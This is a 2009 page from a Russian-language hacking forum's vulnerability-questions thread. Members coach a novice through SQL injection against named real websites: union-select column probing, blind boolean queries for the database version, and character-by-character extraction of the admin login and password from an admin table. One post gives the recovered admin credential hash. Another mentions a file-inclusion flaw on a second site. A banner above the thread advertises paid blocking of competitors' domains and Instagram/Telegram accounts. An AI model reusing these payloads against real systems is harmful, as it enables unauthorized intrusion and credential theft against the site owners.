УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 614 из 1393

614

Опции темы

Поиск в этой теме

Опции просмотра

#6131

23.03.2009, 01:03

ПаВлУшКа

Новичок

Регистрация: 08.02.2009

Сообщений: 24

Провел на форуме:
81772

Репутация: 10

Отправить сообщение для ПаВлУшКа с помощью ICQ

вот, наткнулся на это

Код:

http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2

Unknown column 'Status' in 'field list'

А если делать запросы следующих видов:

Код:

http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2--

Код:

http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2,3

Код:

http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1

Выдает:The used SELECT statements have a different number of columns

Не первый раз такое встречается, кто-нить знает, как это раскрутить?

#6132

23.03.2009, 01:12

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

ПаВлУшКа,

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+concat _ws(0x2F,username,password)+from+admin+limit+0,1), 3,1))>1

#6133

23.03.2009, 01:26

ПаВлУшКа

Новичок

Регистрация: 08.02.2009

Сообщений: 24

Провел на форуме:
81772

Репутация: 10

ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?

#6134

23.03.2009, 01:31

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

Провел на форуме:
11338585

Репутация: 441

Отправить сообщение для DimOnOID с помощью ICQ

Цитата:

Сообщение от ПаВлУшКа

ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=4
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=5
4
А в его запросе-Просто пробелы убери.

#6135

23.03.2009, 01:37

ph1l1ster

Постоянный

Регистрация: 11.03.2008

Сообщений: 347

Провел на форуме:
2075230

Репутация: 462

Отправить сообщение для ph1l1ster с помощью ICQ

Цитата:

Сообщение от ПаВлУшКа

ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?

Вытягивай имя:

Код:

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),5,1))%3E1

5 Символов, скорей всего admin

пасс:

Код:

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+password+from+admin+limit+0,1),32,1))%3E1

32 симола - хэш

#6136

23.03.2009, 02:24

ph1l1ster

Постоянный

Регистрация: 11.03.2008

Сообщений: 347

Провел на форуме:
2075230

Репутация: 462

ПаВлУшКа
admin:3271d6889498c22a81b51aba93dc9307

#6137

23.03.2009, 02:38

ПаВлУшКа

Новичок

Регистрация: 08.02.2009

Сообщений: 24

Провел на форуме:
81772

Репутация: 10

ph1l1ster, а как ты хеш узнал? Я правильно понял:
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),5,1))%3E1

Проверяет, если usermane содержит 5 и меньше символов, то выводится страница, а если больше, то ошибка??

#6138

23.03.2009, 02:45

ph1l1ster

Постоянный

Регистрация: 11.03.2008

Сообщений: 347

Провел на форуме:
2075230

Репутация: 462

ПаВлУшКа
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),1,1))=97
первый символ ascii: 97 char: a

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),2,1))=100
второй символ ascii: 100 char:d

http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+userna me+from+admin+limit+0,1),3,1))=109
третий символ ascii: 109 char: m

и тд.

#6139

23.03.2009, 17:02

HIVER

Познающий

Регистрация: 28.10.2008

Сообщений: 43

Провел на форуме:
117557

Репутация: 125

_http://top.warlib.ru/index.php?cid=1'/*

так же здесь есть инклуд:
_http://www.warlib.ru/index.php?id[]=000117

Раскручивание на замену нулл-байту ничего не дало, может у кого получится)

Последний раз редактировалось HIVER; 23.03.2009 в 17:06..

#6140

23.03.2009, 17:16

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Код:

http://top.warlib.ru/index.php?cid=1+and+substring(version(),1,1)=5

HIVER, пятая ветка.

Страница 614 из 1393

614

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход